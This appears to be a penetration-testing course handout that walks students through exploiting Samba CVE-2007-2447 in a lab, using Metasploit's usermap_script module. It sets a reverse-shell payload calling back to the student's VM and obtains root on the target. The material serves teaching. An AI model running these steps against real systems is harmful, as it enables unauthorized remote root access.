Lesson 2 Lab Notes

In this lab we will do the following:
  • Use the saved NMAP results to search for the Samba services
  • Use Metasploit to exploit Samba.
  • Obtain root access.
What is Samba?

Samba is software that can be run on a platform other than Microsoft Windows, for example, UNIX, Linux, IBM System 390, OpenVMS, and other operating systems. Samba uses the TCP/IP protocol that is installed on the host server. When correctly configured, it allows that host to interact with a Microsoft Windows client or server as if it is a Windows file and print server.

CVE Information:

http://www.cvedetails.com/cve/CVE-2007-2447/

Exploit CVE 2007-2447; The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.

Module Information:

Rapid7 shows you what metasploit module to use https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

And exploit-db, shows you the code of the module. https://www.exploit-db.com/exploits/16320/

Instructions:

We're going to jump run in and select the samba module in Metasploit

use exploit/multi/samba/usermap_script
show options
set RHOST 172.16.56.2
show payloads

This time we're going to drop a payload! A payload is the piece of software that lets you control a computer system after it's been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. The payload we're to select creates a reverse connection back to our VM.

When we use the show payloads command it will return a list of compatible payloads for this exploit. We are going to use cmd/unix/reverse

set payload cmd/unix/reverse
show options

You will now see options for the payload and notice that the LHOST, which stands for Local Host, needs to be set. This will be your VMs IP address. You'll also want to change your LPORT to a different port so you all aren't using the same port in your exploits.

set LHOST 172.16.56.4
set LPORT 8667
exploit
whoami

You will notice that this exploit is running under root and you'll have access do post exploitation if you want to. But we'll dive deeper into that in later lessons.

Keep forever: http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/

results matching ""

    No results matching ""